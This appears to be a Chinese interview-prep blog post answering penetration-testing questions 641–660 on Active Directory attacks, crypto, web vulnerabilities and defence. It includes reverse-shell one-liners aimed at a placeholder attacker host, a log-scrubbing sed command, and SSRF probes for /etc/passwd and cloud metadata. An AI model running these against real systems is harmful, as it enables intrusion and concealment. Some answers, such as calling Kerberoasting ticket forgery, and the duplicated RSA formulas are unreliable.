2025年渗透测试面试题总结-258(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

[641. 假设拿到了某台域机器的权限,但是机器上并没有域账户,应该如何进行域渗透?](#641. 假设拿到了某台域机器的权限,但是机器上并没有域账户,应该如何进行域渗透?)

[642. 域的初始化配置允许任何域用户登录任意加了域的机器,这是为什么?](#642. 域的初始化配置允许任何域用户登录任意加了域的机器,这是为什么?)

[643. 如何查询域管登录过的机器,查询原理又是什么?](#643. 如何查询域管登录过的机器,查询原理又是什么?)

[644. RSA加解密流程](#644. RSA加解密流程)

[645. HTTPS是如何实现的](#645. HTTPS是如何实现的)

[646. 如何防护运营商的DNS劫持/链路劫持](#646. 如何防护运营商的DNS劫持/链路劫持)

[647. 如何防范羊毛党?](#647. 如何防范羊毛党?)

[648. 一个大范围影响的0day被曝光,作为甲方安全工程师,应该如何处理](#648. 一个大范围影响的0day被曝光,作为甲方安全工程师,应该如何处理)

[649. 简述 CTF 攻防赛的流程和一些技巧](#649. 简述 CTF 攻防赛的流程和一些技巧)

[650. 查看当前端口连接的命令有哪些?netstat 和 ss 命令的区别和优缺点;](#650. 查看当前端口连接的命令有哪些?netstat 和 ss 命令的区别和优缺点;)

[651. Linux 服务器的安全运维操作有哪些?如何保护 SSH?](#651. Linux 服务器的安全运维操作有哪些?如何保护 SSH?)

[652. 入侵 Linux 服务器后需要清除哪些日志?](#652. 入侵 Linux 服务器后需要清除哪些日志?)

[653. 一般常反弹哪一种 shell?](#653. 一般常反弹哪一种 shell?)

[654. 介绍渗透测试的流程;](#654. 介绍渗透测试的流程;)

[655. 简要介绍自己常用的扫描器和其实现上的特点;](#655. 简要介绍自己常用的扫描器和其实现上的特点;)

[656. 介绍 SQL 注入漏洞成因,如何防范?注入方式有哪些?除了数据库数据,利用方式还有哪些?](#656. 介绍 SQL 注入漏洞成因,如何防范?注入方式有哪些?除了数据库数据,利用方式还有哪些?)

[657. 如何防范 XSS 漏洞,在前端如何做,在后端如何做,哪里更好,为什么?](#657. 如何防范 XSS 漏洞,在前端如何做,在后端如何做,哪里更好,为什么?)

[658. 介绍 CSRF 漏洞和常用的防护手段;](#658. 介绍 CSRF 漏洞和常用的防护手段;)

[659. 介绍 SSRF 漏洞,如何深入利用?如何探测非 HTTP 协议?如何防范?](#659. 介绍 SSRF 漏洞,如何深入利用?如何探测非 HTTP 协议?如何防范?)

[660. 如何防范羊毛党(有猫池)?](#660. 如何防范羊毛党(有猫池)?)

复制代码
641	假设拿到了某台域机器的权限,但是机器上并没有域账户,应该如何进行域渗透? 
642	域的初始化配置允许任何域用户登录任意加了域的机器,这是为什么? 
643	如何查询域管登录过的机器,查询原理又是什么? 
644	RSA加解密流程
645	HTTPS是如何实现的
646	如何防护运营商的DNS劫持/链路劫持
647	如何防范羊毛党?
648	一个大范围影响的0day被曝光,作为甲方安全工程师,应该如何处理
649	简述 CTF 攻防赛的流程和一些技巧
650	查看当前端口连接的命令有哪些?`netstat` 和 `ss` 命令的区别和优缺点;
651	Linux 服务器的安全运维操作有哪些?如何保护 SSH?
652	入侵 Linux 服务器后需要清除哪些日志?
653	一般常反弹哪一种 shell?
654	介绍渗透测试的流程;
655	简要介绍自己常用的扫描器和其实现上的特点;
656	介绍 SQL 注入漏洞成因,如何防范?注入方式有哪些?除了数据库数据,利用方式还有哪些?
657	如何防范 XSS 漏洞,在前端如何做,在后端如何做,哪里更好,为什么?
658	介绍 CSRF 漏洞和常用的防护手段;
659	介绍 SSRF 漏洞,如何深入利用?如何探测非 HTTP 协议?如何防范?
660	如何防范羊毛党(有猫池)?

641. 假设拿到了某台域机器的权限,但是机器上并没有域账户,应该如何进行域渗透?

在获取了域机器权限但无有效域账户的情况下,域渗透的核心目标是横向移动或提升权限以获取域管凭据。常见策略包括:

  1. 凭据提取与重用:利用工具(如 Mimikatz)提取内存中的 Kerberos 票据或 NTLM 哈希(Pass-the-Hash 攻击)。即使本地无域账户,系统进程可能缓存域凭据(例如,服务账户或交互式登录会话)。
  2. 伪造票据攻击:通过 Kerberoasting 或 Golden Ticket 攻击伪造 Kerberos 票据。Golden Ticket 允许以任意用户身份访问域资源,需先获取 KRBTGT 账户哈希(通常通过 DC Sync 攻击实现)。
  3. 横向移动:扫描内网(如使用 CrackMapExec)寻找脆弱服务(如 SMB、RDP),利用漏洞(如 MS17-010)或传递哈希登录其他域机器。最终目标是定位域控制器(DC)并获取其数据。
  4. 利用信任关系 :如果机器是域成员,查询域策略(gpresult /r)或 LDAP 信息(ldapsearch),找出配置错误(如宽松的 ACLs),允许未授权访问域资源。
    补充:此场景常见于红队测试,强调最小权限原则的渗透路径,需结合工具链(如 Empire 或 Cobalt Strike)自动化执行。

642. 域的初始化配置允许任何域用户登录任意加了域的机器,这是为什么?

此默认行为源于 Active Directory(AD)的便捷性和管理效率,但存在安全风险:

  • 设计初衷:AD 的默认组策略(GPO)允许所有域用户登录域内任何机器,以简化用户管理(例如,企业员工可灵活使用共享工作站)。这减少了管理员配置负担,尤其在大规模环境中。
  • 安全权衡 :虽然便于协作,却忽略了最小权限原则(PoLP)。攻击者可借此横向移动(如通过 Pass-the-Ticket),因此实际部署时应限制登录权限(如通过 GPO 设置"拒绝本地登录"组)。
    补充:Microsoft 将此作为"方便优先"的遗留设计,现代最佳实践推荐启用"受限组"策略或使用 Just Enough Administration(JEA)来限制访问。

643. 如何查询域管登录过的机器,查询原理又是什么?

查询域管登录记录是检测高级威胁的关键步骤,常用方法及原理如下:

  • 方法
    1. 事件日志分析 :在域控制器(DC)或工作站上查询安全日志(Event ID 4776 或 4624),使用 PowerShell 命令(如 Get-WinEvent)过滤 Domain Admins 组的 SID。
    2. 工具辅助 :使用 AD 查询工具(如 BloodHound)可视化登录路径,或执行 LDAP 查询(dsquery)检查账户的 lastLogon 属性。
  • 原理 :基于 Kerberos 认证机制。当用户登录时,DC 生成 TGT(Ticket Granting Ticket)并记录到事件日志;工作站则缓存登录信息(LSASS 进程)。查询依赖这些日志或缓存,但需注意日志默认保留期短(通常30天),需启用审计策略。
    补充:在防御中,此查询常用于检测 Golden Ticket 攻击,原理是异常登录时间或位置(如非 DC 登录)。

644. RSA加解密流程

RSA 是一种非对称加密算法,流程基于大数分解难题:

  1. 密钥生成
    • 选择两个大质数 pp 和 qq,计算模数 n=p×qn=p×q 和欧拉函数 ϕ(n)=(p−1)(q−1)ϕ(n)=(p−1)(q−1)。
    • 选择公钥指数 ee(通常为65537),确保与 ϕ(n)ϕ(n) 互质;计算私钥指数 dd(满足 e×d≡1mod  ϕ(n)e×d≡1modϕ(n))。
  2. 加密:对明文 MM 加密为密文 CC,使用公钥 (e,n)(e,n): C=Memod  nC=Memodn。
  3. 解密 :使用私钥 (d,n)(d,n) 解密密文: M=Cdmod  nM=Cdmodn。
    补充:RSA 常用于数字签名和密钥交换(如 TLS),但需注意填充方案(如 OAEP)防范攻击;现实中,密钥长度推荐≥2048位。

645. HTTPS是如何实现的

HTTPS 通过 TLS/SSL 协议在 HTTP 上实现加密通信,确保数据机密性和完整性:

  1. 握手阶段
    • 客户端发送"ClientHello" 提议加密套件;服务器响应"ServerHello" 选择方案并发送证书。
    • 客户端验证证书(CA 链可信性),生成预主密钥并用服务器公钥加密发送。
    • 双方派生会话密钥(对称密钥),用于后续通信。
  2. 加密传输:使用会话密钥(如 AES-GCM)加密 HTTP 数据,辅以 HMAC 确保完整性。
  3. 会话恢复 :支持会话 ID 或 Session Tickets 减少握手开销。
    补充:HTTPS 依赖公钥基础设施(PKI),现代实现包括 HTTP/2 或 QUIC 优化性能;漏洞如 Heartbleed 凸显了密钥管理重要性。

646. 如何防护运营商的DNS劫持/链路劫持

DNS 劫持(运营商重定向查询)和链路劫持(注入广告或重定向)可通过多层防御缓解:

  1. 加密 DNS 查询:使用 DNS over HTTPS (DoH) 或 DNS over TLS (DoT) 协议(如 Cloudflare 1.1.1.1),加密查询防止窥探。
  2. DNSSEC 部署:在域名解析中启用 DNSSEC,通过数字签名验证响应真实性,防止篡改。
  3. 客户端防护:配置浏览器(如 Chrome 的 Secure DNS 设置)或使用 VPN 加密所有流量,绕过运营商中间件。
  4. 监控与举报 :定期测试 DNS 泄露(工具如 DNSLeakTest),并向监管机构举报运营商不当行为。
    补充:链路劫持还需 HSTS(HTTP Strict Transport Security)强制 HTTPS,防范 SSL Strip 攻击。

647. 如何防范羊毛党?

羊毛党通过批量账号薅取优惠,防范需结合技术和业务策略:

  1. 行为分析:部署 AI 风险引擎(如腾讯云天御),监控异常模式(如高频请求、IP 聚集),实时拦截。
  2. 多因素认证:引入 CAPTCHA、短信验证或设备绑定,增加自动化攻击成本。
  3. 规则引擎:设置动态阈值(如新用户首单限制),结合风控系统(如阿里风控大脑)调整策略。
  4. 数据维度 :关联设备指纹(如 IMEI)、IP 信誉库和社交图谱,识别猫池设备。
    补充:羊毛党防御本质是成本博弈,需平衡用户体验与安全;参考电商平台(如淘宝)的实时评分模型。

648. 一个大范围影响的0day被曝光,作为甲方安全工程师,应该如何处理

处理 0day 漏洞需快速响应以最小化影响:

  1. 紧急评估:确认漏洞细节(CVE ID、影响范围),使用扫描器(如 Nessus)检测内部暴露面,并启动事件响应计划。
  2. 临时缓解:部署 WAF 规则或网络隔离限制攻击面(如禁用脆弱服务);通知员工警惕钓鱼。
  3. 补丁管理:跟踪厂商补丁,测试后优先修补关键系统(自动化工具有 Ansible)。
  4. 事后复盘 :分析入侵指标(IoC),更新安全策略(如强化 EDR),并进行红队演练验证。
    补充:0day 响应强调协作(如共享 ISAC 情报),平均修复时间(MTTR)应 ≤24 小时。

649. 简述 CTF 攻防赛的流程和一些技巧

CTF(Capture The Flag)攻防赛分阶段进行,技巧注重效率和协作:

  • 流程
    1. 准备阶段:团队分工(攻击、防守、分析),部署蜜罐和监控工具(如 Splunk)。
    2. 攻击阶段:快速扫描漏洞(Nmap + Burp Suite),利用已知漏洞(如 Web Shell)夺旗。
    3. 防守阶段:加固服务(打补丁、禁用无用端口),检测并阻断对手攻击(使用 IDS 如 Snort)。
  • 技巧
    • 自动化脚本(Python PoC)快速利用;
    • 专注高分服务(如数据库);
    • 实时分享情报(Slack 频道);
    • 防守时保留日志取证反击。
      补充:CTF 模拟真实攻防,技巧包括"flag 隐藏"(如隐写术)和心理战(干扰对手)。

650. 查看当前端口连接的命令有哪些?netstatss 命令的区别和优缺点;

常用命令包括 netstatsslsofnmap。重点比较 netstatss

  • netstat
    • 优点:跨平台支持(Windows/Linux),输出易读(netstat -tuln 显示监听端口)。
    • 缺点:性能低(解析 /proc/net 文件),现代 Linux 逐步弃用。
  • ss
    • 优点:直接读取内核数据(速度更快),支持过滤(如 ss -t state established 显示活动连接)。
    • 缺点:语法复杂,旧系统兼容性差。
      补充:优先使用 ss(Linux 推荐),lsof -i 可映射进程,提升运维效率。

651. Linux 服务器的安全运维操作有哪些?如何保护 SSH?

安全运维操作覆盖预防与监控:

  1. 基础加固
    • 定期更新(apt update && apt upgrade);
    • 最小化服务(禁用未使用端口);
    • 启用防火墙(iptables/nftables)。
  2. SSH 保护
    • 禁用 root 登录(PermitRootLogin no);
    • 使用密钥认证(禁用密码);
    • 限制 IP 访问(AllowUsers 或 Fail2Ban)。
  3. 监控审计 :配置日志(syslog + auditd),定期扫描漏洞(Lynis)。
    补充:SSH 是入口点,保护可减少 90% 暴力破解风险;参考 CIS 基准最佳实践。

652. 入侵 Linux 服务器后需要清除哪些日志?

清除日志以掩盖踪迹,关键日志包括:

  1. 认证日志/var/log/auth.log (记录登录),删除相关条目(如 sed -i '/your_ip/d' auth.log )。
  2. 系统日志/var/log/syslog/var/log/messages(覆盖命令历史)。
  3. Web 日志 :Apache/Nginx 访问日志(如 /var/log/apache2/access.log )。
  4. 审计日志auditd 记录(需停止服务后清除)。
    补充:彻底清除需覆盖磁盘(shred),但可能触发审计;防御方可通过集中式日志(ELK Stack)预防。

653. 一般常反弹哪一种 shell?

反弹 shell(Reverse Shell)是渗透中常用技术,常见类型:

  • Bash/Python Shell :简单高效,命令如 bash -i >& /dev/tcp/attacker_ip/port 0>&1
  • Netcat Shell :跨平台,nc -e /bin/sh attacker_ip port
  • 加密 Shell :使用 OpenSSL 或 Meterpreter(规避检测)。
    补充:选择取决于环境(如受限环境用 Python),反弹 shell 绕过防火墙出站限制。

654. 介绍渗透测试的流程;

渗透测试(PenTest)流程结构化分五阶段:

  1. 侦察(Reconnaissance):被动信息收集(Whois、Shodan),确定目标范围。
  2. 扫描(Scanning):主动扫描端口(Nmap)、漏洞(Nessus),识别攻击面。
  3. 利用(Exploitation):利用漏洞获取权限(Metasploit),提升至管理员。
  4. 后渗透(Post-Exploitation):横向移动、数据窃取(Mimikatz),维持访问。
  5. 报告(Reporting) :文档化漏洞、风险评级和建议修复方案。
    补充:流程遵循 PTES 标准,强调合法授权和最小影响。

655. 简要介绍自己常用的扫描器和其实现上的特点;

常用扫描器针对不同场景,特点如下:

  • Nmap:网络扫描器,特点为灵活脚本(NSE)和主机发现(SYN 扫描),快速识别开放端口和服务。
  • Burp Suite:Web 漏洞扫描器,特点在拦截代理和主动扫描(SQLi/XSS 检测),支持自定义插件。
  • Nessus :综合漏洞扫描,特点在庞大插件库(CVE 匹配)和合规检查(CIS),但资源消耗高。
    补充:扫描器实现依赖协议分析(Nmap)或模糊测试(Burp),需定期更新规则库。

656. 介绍 SQL 注入漏洞成因,如何防范?注入方式有哪些?除了数据库数据,利用方式还有哪些?

SQL 注入(SQLi)是 Web 安全核心威胁:

  • 成因 :未过滤用户输入,拼接 SQL 查询(如 "SELECT * FROM users WHERE name='" + userInput + "'"),导致恶意 SQL 执行。
  • 防范
    1. 参数化查询(预编译语句);
    2. 输入验证(白名单过滤);
    3. WAF 规则(如 ModSecurity)。
  • 注入方式:Union-based、Error-based、Blind(布尔/时间盲注)。
  • 其他利用 :绕过认证、文件读写(LOAD_FILE)、操作系统命令执行(通过 xp_cmdshell)。
    补充:SQLi 可导致数据泄露(如 Equifax 事件),防范需 SDLC 集成安全测试。

657. 如何防范 XSS 漏洞,在前端如何做,在后端如何做,哪里更好,为什么?

XSS(跨站脚本)防范需前后端协同:

  • 前端 :输入输出编码(如 JavaScript 的 textContent 替代 innerHTML),使用框架(React/Vue)自动转义。
  • 后端 :输入验证(过滤 <script>),输出编码(库如 OWASP ESAPI),部署 CSP(Content Security Policy)限制脚本源。
  • 优劣 :后端更可靠,因前端可绕过(禁用 JS);但结合 CSP 的前端方案提升用户体验。理想策略是"后端为主,前端为辅",确保深度防御。
    补充:XSS 分存储型、反射型和 DOM 型,CSP 能阻断 80% 攻击。

658. 介绍 CSRF 漏洞和常用的防护手段;

CSRF(跨站请求伪造)诱使用户执行非意图操作:

  • 漏洞原理 :攻击者伪造请求(如恶意图片标签 <img src="http://bank.com/transfer?to=attacker"> ),用户浏览器自动发送认证 cookie。
  • 防护手段
    1. CSRF Token:服务器生成唯一 token 嵌入表单,验证请求来源。
    2. SameSite Cookie:设置 Cookie 属性(SameSite=Lax)限制跨域请求。
    3. 验证 Referer 头:检查请求来源域是否合法。
      补充:CSRF 常与 XSS 结合(如盗取 token),防护需在关键操作(如转账)强制使用。

659. 介绍 SSRF 漏洞,如何深入利用?如何探测非 HTTP 协议?如何防范?

SSRF(服务器端请求伪造)使服务器发起内部请求:

  • 漏洞成因 :未校验用户提供的 URL(如 http://api?url=internal_ip),导致访问内网资源。
  • 深入利用
    • 扫描内网(探测 192.168.x.x);
    • 访问 metadata 服务(如 AWS IMDS 窃取凭证);
    • 攻击非 HTTP 协议(如 gopher:// 发送 Redis 命令)。
  • 探测非 HTTP :使用协议包装(file:///etc/passwddict://),工具(SSRFmap)自动化测试。
  • 防范 :输入白名单(仅允许公网域名)、网络隔离(禁止服务器访问内网)、使用中间代理验证 URL。
    补充:SSRF 可升级为 RCE(如 PHP 的 expect://),是云环境高危漏洞。

660. 如何防范羊毛党(有猫池)?

针对猫池(批量 SIM 卡设备)的羊毛党,需强化设备级检测:

  1. 设备指纹:采集 IMEI、MAC 地址和浏览器指纹(如 FingerprintJS),识别重复设备(即使 IP 轮换)。
  2. 行为生物识别:分析交互模式(鼠标轨迹、输入速度),区分机器人与真人。
  3. 猫池专项检测:监控短信验证码频率(限制单设备发送量),结合运营商数据验证 SIM 卡真实性。
  4. 混合验证 :结合 AI 风控(如设备画像)和人工审核(可疑订单复审)。
    补充:猫池防御强调"设备唯一性",参考金融行业的智能风控系统(如蚂蚁金服 AlphaRisk),降低误杀率。
相关推荐
程序员小远2 小时前
Appium-移动端自动测试框架详解
自动化测试·软件测试·python·测试工具·职场和发展·appium·测试用例
青瓷程序设计3 小时前
花朵识别系统【最新版】Python+TensorFlow+Vue3+Django+人工智能+深度学习+卷积神经网络算法
人工智能·python·深度学习
AI绘画小333 小时前
网络安全(黑客技术)—2025自学手册
网络·安全·web安全·网络安全·渗透测试
hyswl6663 小时前
2025年郑州开发小程序公司推荐
python·小程序
B站计算机毕业设计之家3 小时前
基于Python音乐推荐系统 数据分析可视化 协同过滤推荐算法 大数据(全套源码+文档)建议收藏✅
python·数据分析·推荐算法
合才科技3 小时前
【要闻周报】网络安全与数据合规 11-21
安全·web安全
用户785127814703 小时前
实战解析:淘宝/天猫商品描述API(taobao.item_get_desc)接口
python
codists3 小时前
Pycharm错误:JetBrains AI URL resolution failure
python
青瓷程序设计4 小时前
鱼类识别系统【最新版】Python+TensorFlow+Vue3+Django+人工智能+深度学习+卷积神经网络算法
人工智能·python·深度学习